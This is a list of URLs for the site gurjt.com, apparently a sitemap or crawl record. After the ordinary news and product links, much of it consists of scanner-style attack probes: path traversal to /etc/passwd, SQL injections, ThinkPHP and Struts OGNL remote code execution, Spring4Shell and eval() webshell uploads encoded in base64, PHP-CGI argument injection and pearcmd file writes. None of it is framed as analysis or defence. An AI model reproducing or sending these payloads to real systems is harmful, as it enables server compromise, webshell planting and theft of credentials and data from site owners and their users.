http://www.gurjt.com/ http://www.gurjt.com/?s=Index/m_index.html http://www.gurjt.com/?s=Index/product/cateID/1 http://www.gurjt.com/d/47.html http://www.gurjt.com/d/20.html http://www.gurjt.com/d/21.html http://www.gurjt.com/news/73.html http://www.gurjt.com/newslist/72.html http://www.gurjt.com/newslist/47.html http://www.gurjt.com/newslist/46.html http://www.gurjt.com/news/47.html http://www.gurjt.com/news/20.html http://www.gurjt.com/news/74.html http://gurjt.com/d/42.html http://www.gurjt.com/newslist/36.html http://gurjt.com/newslist/68.html http://www.gurjt.com/newslist/26.html http://gurjt.com/newslist/51.html http://gurjt.com/?feed=rss2 http://gurjt.com/about/3.html http://gurjt.com/newslist/60.html http://www.gurjt.com/newslist/62.html http://www.gurjt.com/newslist/50.html http://gurjt.com/news/30.html http://gurjt.com/news/71.html http://gurjt.com/news/72.html http://gurjt.com/newslist/74.html http://gurjt.com/newslist/21.html http://gurjt.com/newslist/63.html http://www.gurjt.com/newslist/22.html http://gurjt.com/newslist/53.html http://www.gurjt.com/m_d/21.html http://www.gurjt.com/newslist/39.html http://gurjt.com/newslist/31.html http://gurjt.com/newslist/66.html http://gurjt.com/newslist/25.html http://www.gurjt.com/newslist/61.html http://www.gurjt.com/newslist/44.html http://www.gurjt.com/newslist/42.html http://gurjt.com/d/23.html http://gurjt.com/news/32.html http://gurjt.com/newslist/77.html http://www.gurjt.com/m_newslist/48.html http://www.gurjt.com/about/34.html http://www.gurjt.com/m_d/25.html http://www.gurjt.com/m_d/24.html http://www.gurjt.com/m_d/23.html http://www.gurjt.com/m_d/22.html http://www.gurjt.com/m_d/20.html http://www.gurjt.com/news/26.html http://www.gurjt.com/news/25.html http://www.gurjt.com/news/24.html http://www.gurjt.com/news/23.html http://www.gurjt.com/news/27.html http://www.gurjt.com/news/22.html http://www.gurjt.com/news/21.html http://www.gurjt.com/news/28.html http://www.gurjt.com/news/29.html http://www.gurjt.com/news/34.html http://www.gurjt.com/news/35.html http://www.gurjt.com/news/36.html http://www.gurjt.com/news/40.html http://www.gurjt.com/news/41.html http://www.gurjt.com/news/42.html http://www.gurjt.com/news/46.html http://www.gurjt.com/news/75.html http://www.gurjt.com/news/76.html http://www.gurjt.com/news/77.html http://www.gurjt.com/news/31.html http://www.gurjt.com/news/33.html http://www.gurjt.com/news/37.html http://www.gurjt.com/news/38.html http://www.gurjt.com/news/39.html http://www.gurjt.com/news/43.html http://www.gurjt.com/news/44.html http://www.gurjt.com/news/45.html http://www.gurjt.com/news/49.html http://www.gurjt.com/news/50.html http://www.gurjt.com/news/51.html http://www.gurjt.com/news/52.html http://www.gurjt.com/news/53.html http://www.gurjt.com/news/54.html http://www.gurjt.com/news/55.html http://www.gurjt.com/news/56.html http://www.gurjt.com/news/57.html http://www.gurjt.com/news/58.html http://www.gurjt.com/news/59.html http://www.gurjt.com/news/60.html http://www.gurjt.com/news/61.html http://www.gurjt.com/news/62.html http://www.gurjt.com/news/63.html http://www.gurjt.com/news/64.html http://www.gurjt.com/about/4.html http://www.gurjt.com/news/65.html http://www.gurjt.com/news/66.html http://www.gurjt.com/news/67.html http://www.gurjt.com/news/68.html http://www.gurjt.com/news/69.html http://www.gurjt.com/news/70.html http://www.gurjt.com/d/26.html http://www.gurjt.com/d/25.html http://www.gurjt.com/d/24.html http://www.gurjt.com/d/22.html http://www.gurjt.com/d/27.html http://www.gurjt.com/d/28.html http://www.gurjt.com/d/29.html http://www.gurjt.com/d/34.html http://www.gurjt.com/d/35.html http://www.gurjt.com/d/36.html http://www.gurjt.com/d/40.html http://www.gurjt.com/d/41.html http://www.gurjt.com/d/46.html http://gurjt.com/newslist/28.html http://www.gurjt.com/newslist/30.html http://www.gurjt.com/newslist/29.html http://www.gurjt.com/newslist/58.html http://www.gurjt.com/index.php?m=admin&c=index&a=login&pc_hash= http://www.gurjt.com/newslist/64.html http://gurjt.com/?s=index/product/cateid/1 http://gurjt.com/newslist/27.html http://gurjt.com/newslist/37.html http://www.gurjt.com/newslist/24.html http://gurjt.com/newslist/57.html http://www.gurjt.com/newslist/33.html http://www.gurjt.com/newslist/23.html http://www.gurjt.com/newslist/55.html http://gurjt.com/newslist/52.html http://www.gurjt.com/newslist/34.html http://gurjt.com/newslist/32.html http://www.gurjt.com/newslist/38.html http://www.gurjt.com/index.php?m=admin&c=index&a=login&pc_hash= http://gurjt.com/common/download/resource?resource=/profile/../../../../etc/passwd http://gurjt.com/common/download/resource?resource=/profile/../../../../Windows/win.ini http://www.gurjt.com/common/download/resource?resource=/profile/../../../../etc/passwd http://www.gurjt.com/common/download/resource?resource=/profile/../../../../Windows/win.ini http://gurjt.com/mobile/plugin/browser.jsp http://gurjt.com/?destination=node&q=node http://gurjt.com/index.php?item_id=1&list[ordering]&list[select]=updatexml(0x23,concat(1,md5(8888)),1)&option=com_contenthistory&type_id=1&view=history http://www.gurjt.com/index.php?item_id=1&list[ordering]&list[select]=updatexml(0x23,concat(1,md5(8888)),1)&option=com_contenthistory&type_id=1&view=history http://www.gurjt.com/index.php?file=/etc/passwd&op=fileviewer http://gurjt.com/index.php?file=/etc/passwd&op=fileviewer http://gurjt.com/?name[#markup]=wnmg%%mhur&name[#post_render][]=printf&name[#type]=markup&q=user/password http://www.gurjt.com/?name[#markup]=pwtn%%ayte&name[#post_render][]=printf&name[#type]=markup&q=user/password http://www.gurjt.com/?q=file/ajax/name/#value/search["build_id"] http://gurjt.com/?q=file/ajax/name/#value/search["build_id"] http://www.gurjt.com/index.php?m=admin&c=index&a=login&pc_hash= http://www.gurjt.com/#SLPointDomain#.rar http://www.gurjt.com/#SLPointDomain#.zip http://www.gurjt.com/#firstdomain#.rar http://www.gurjt.com/#firstdomain#.zip http://www.gurjt.com/#SLPointDomain#.tar.gz http://www.gurjt.com/#firstdomain#.tar.gz http://www.gurjt.com/#SLPointDomain#.7z http://www.gurjt.com/#firstdomain#.7z http://www.gurjt.com/news/78.html http://www.gurjt.com/news/79.html http://www.gurjt.com/newslist/80.html http://www.gurjt.com/newslist/56.html http://www.gurjt.com/news/80.html http://www.gurjt.com/newslist/45.html http://gurjt.com/newslist/40.html http://gurjt.com/?PHPRC=/dev/fd/0 http://gurjt.com/newslist/59.html http://www.gurjt.com/?id=1' AND (SELECT 1 FROM (SELECT(SLEEP(10)))a)-- &rest_route=/h5vp/v1/view/1 http://gurjt.com/?id=1' AND (SELECT 1 FROM (SELECT(SLEEP(10)))a)-- &rest_route=/h5vp/v1/view/1 http://www.gurjt.com/index/login.cgi http://gurjt.com/0/Authenticate http://gurjt.com/?/AdminAppData@no-mobile-0/0/15503332983847185/ http://gurjt.com/index.php?action=login.index&host=0 http://www.gurjt.com/index.php?action=login.index&host=0 http://gurjt.com/index.php?lang=en http://www.gurjt.com/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 http://gurjt.com/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 http://gurjt.com/newslist/54.html http://www.gurjt.com/newslist/35.html http://www.gurjt.com/newslist/41.html http://gurjt.com/index.php?lang=en http://www.gurjt.com/?jwtmdm=1 http://gurjt.com/?jcbvsd=1 http://www.gurjt.com/?query=SHOW DATABASES http://www.gurjt.com/?act=execsql&case=crossall&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5 http://gurjt.com/index.php?lang=en http://gurjt.com/index.php?item_id=1&list[ordering]&list[select]=updatexml(0x23,concat(1,md5(8888)),1)&option=com_contenthistory&type_id=1&view=history http://www.gurjt.com/?name[ http://gurjt.com/common/download/resource?resource=/profile/../../../../Windows/win.ini http://www.gurjt.com/?id=1' AND (SELECT 1 FROM (SELECT(SLEEP(10)))a)-- &rest_route=/h5vp/v1/view/1 http://www.gurjt.com/m_d/47.html http://www.gurjt.com/m_news/48.html http://www.gurjt.com/kefu.html http://www.gurjt.com/index.php?item_id=1&list[ordering]&list[select]=updatexml(0x23,concat(1,md5(8888)),1)&option=com_contenthistory&type_id=1&view=history http://gurjt.com/index.php?lang=en http://www.gurjt.com/common/download/resource?resource=/profile/../../../../Windows/win.ini http://gurjt.com/mobile/plugin/changeUserInfo.jsp?mobile=1&type=getLoginid http://www.gurjt.com/mobile/plugin/changeUserInfo.jsp?mobile=1&type=getLoginid http://www.gurjt.com/mobile/plugin/changeUserInfo.jsp?mobile=2&type=getLoginid http://www.gurjt.com/mobile/plugin/changeUserInfo.jsp?mobile=3&type=getLoginid http://gurjt.com/mobile/plugin/changeUserInfo.jsp?mobile=2&type=getLoginid http://www.gurjt.com/mobile/plugin/changeUserInfo.jsp?mobile=4&type=getLoginid http://gurjt.com/mobile/plugin/changeUserInfo.jsp?mobile=3&type=getLoginid http://www.gurjt.com/mobile/plugin/changeUserInfo.jsp?mobile=5&type=getLoginid http://www.gurjt.com/mobile/plugin/changeUserInfo.jsp?loginId=admin&type=status http://gurjt.com/mobile/plugin/changeUserInfo.jsp?mobile=4&type=getLoginid http://www.gurjt.com/mobile/plugin/changeUserInfo.jsp?loginId=test&type=status http://gurjt.com/mobile/plugin/changeUserInfo.jsp?mobile=5&type=getLoginid http://gurjt.com/mobile/plugin/changeUserInfo.jsp?loginId=admin&type=status http://gurjt.com/mobile/plugin/changeUserInfo.jsp?loginId=test&type=status http://www.gurjt.com/common/download/resource?resource=/profile/../../../../etc/passwd http://gurjt.com/?id=1' AND (SELECT 1 FROM (SELECT(SLEEP(10)))a)-- &rest_route=/h5vp/v1/view/1 http://gurjt.com/mobile/DBconfigReader.jsp http://www.gurjt.com/index.php?op=fileviewer http://www.gurjt.com/mobile/plugin/1/ofsLogin.jsp?gopage=3&loginTokenFromThird&receiver=test&syscode=syscode×tamp=2 http://gurjt.com/mobile/plugin/1/ofsLogin.jsp?gopage=3&loginTokenFromThird&receiver=test&syscode=syscode×tamp=2 http://gurjt.com/index.php?lang=en http://gurjt.com/index.php?lang=en http://gurjt.com/?name[ http://gurjt.com/common/download/resource?resource=/profile/../../../../etc/passwd http://www.gurjt.com/index.php?a=showcate&id=103 UNION ALL SELECT CONCAT(md5(208860687))#&m=Goods http://gurjt.com/index.php?a=showcate&id=103 UNION ALL SELECT CONCAT(md5(206025303))#&m=Goods http://gurjt.com/common/parseTree.jsp?code=1'waitfor delay '0:0:10'-- http://www.gurjt.com/common/parseTree.jsp?code=1'waitfor delay '0:0:10'-- http://www.gurjt.com/index.php?a=login&c=index&m=admin&pc_hash http://gurjt.com/?rest_route=/wp/v2/users/ http://www.gurjt.com/index.php?m=admin&c=index&a=login&pc_hash= http://gurjt.com/?redirect=../../../../windows/win.ini http://gurjt.com/?page=../../../../../windows/win.ini http://gurjt.com/?url=../../../../../../windows/win.ini http://gurjt.com/index.php?op=fileviewer http://gurjt.com/m_d/46.html http://gurjt.com/m_d/42.html http://gurjt.com/m_d/41.html http://www.gurjt.com/index.php?option=com_vreview&task=displayReply http://gurjt.com/index.php?option=com_vreview&task=displayReply http://gurjt.com/index.php?controller=../../../../../../../../../../etc/passwd&option=com_jvehicles http://www.gurjt.com/index.php?controller=../../../../../../../../../../etc/passwd&option=com_jvehicles http://www.gurjt.com/?m=home&a=assign_resume_tpl http://gurjt.com/m_d/40.html http://www.gurjt.com/m_d/36.html http://gurjt.com/mobile/plugin/kefu.html http://gurjt.com/?file_name=../modules/system/import_export.mds&g=sys_export_conf_local_save http://gurjt.com/index.php?option=com_adsmanager&task=upload&tmpl=component http://gurjt.com/?a=display&templateFile=README.md http://gurjt.com/index.php?a=fetch&content= /var/www/html/969304706.php&lang=../../../../../../../../usr/local/lib/php/pearcmd http://www.gurjt.com/? config-create / /var/www/html/819946530.php&lang=../../../../../../../../usr/local/lib/php/pearcmd http://www.gurjt.com/? config-create / /var/www/html/819946530.php http://gurjt.com/? config-create / /var/www/html/969304706.php http://www.gurjt.com//index.php http://www.gurjt.com//?s=index/\think\template\driver\file/write&cacheFile=robots1.php&content=xbshell http://www.gurjt.com//?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]= http://www.gurjt.com//?s=index/\think\template\driver\file/write&cacheFile=robots.php&content=xbshell1 1), array(1), $ch[1].$ch[3].$ch[4]);?> http://www.gurjt.com//?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET['fuck']);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs)); http://www.gurjt.com//index.php?m=member&c=index&a=register&siteid=1 http://www.gurjt.com//index.php?m=vod-search http://www.gurjt.com//index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=libsoft.php&vars[1][1]= http://www.gurjt.com//index.php?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=libsoft.php&vars[1][1]= http://www.gurjt.com//?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('nuan.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydobTE0NzI1OCddKTs/Pg==')); http://www.gurjt.com//?-d allow_url_include=on -d auto_prepend_file=php://input http://www.gurjt.com/mobile/plugin/CheckServer.jsp?type=mobileSetting http://gurjt.com/mobile/plugin/CheckServer.jsp?type=mobileSetting http://gurjt.com/index.php?f=login_save&m=member http://www.gurjt.com/index.php?f=login_save&m=member http://gurjt.com/common/dept.jsp?deptid=1' UNION ALL SELECT 60,sys.fn_sqlvarbasetostr(HASHBYTES('MD5','12345'))-- http://www.gurjt.com/common/dept.jsp?deptid=1' UNION ALL SELECT 60,sys.fn_sqlvarbasetostr(HASHBYTES('MD5','12345'))-- http://gurjt.com/?/member/cart/Fastpay&shopid=-1 union select md5(2060309371),2,3,4 -- http://www.gurjt.com/?/member/cart/Fastpay&shopid=-1 union select md5(2019862554),2,3,4 -- http://www.gurjt.com/newslist/43.html http://gurjt.com/index.php?-d allow_url_include=on -d auto_prepend_file=php://input http://www.gurjt.com/index.php?-d allow_url_include=on -d auto_prepend_file=php://input http://gurjt.com/?name=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} http://www.gurjt.com/?name=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} http://gurjt.com/index.php?layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)&option=com_fields&view=fields http://www.gurjt.com/index.php?layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)&option=com_fields&view=fields http://gurjt.com/index.php?target=db_sql.php%3f/../../../../../../../../etc/passwd http://www.gurjt.com/index.php?target=db_sql.php%3f/../../../../../../../../etc/passwd http://gurjt.com/index.php?format=raw&no_html=1&option=com_zhbaidumap&task=getPlacemarkDetails http://www.gurjt.com/index.php?format=raw&no_html=1&option=com_zhbaidumap&task=getPlacemarkDetails http://www.gurjt.com/index.php?id=1&option=com_prayercenter&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5(901166925)))-- X&task=confirm http://gurjt.com/index.php?id=1&option=com_prayercenter&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5(854315744)))-- X&task=confirm http://www.gurjt.com/?id=afrogtest%{128*128} http://gurjt.com/?id=afrogtest%{128*128} http://gurjt.com/?id=%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("cat /etc/passwd")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))} http://www.gurjt.com/?id=%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("cat /etc/passwd")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))} http://gurjt.com/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets http://gurjt.com/index.php?option=com_myblog&task=ajaxupload http://gurjt.com/?post_ids=0) union select md5(43752),null,null -- g&rest_route=/pvc/v1/increase/1 http://www.gurjt.com/?post_ids=0) union select md5(61043),null,null -- g&rest_route=/pvc/v1/increase/1 http://gurjt.com/?class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.prefix=rqwpvxrq&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp http://www.gurjt.com/?class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.prefix=egxjtsjn&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp http://gurjt.com/common/.git/config http://www.gurjt.com/index.php?m=admin http://gurjt.com/index.php?lang=en http://www.gurjt.com/mobile/sp_admin_852/managefile.asp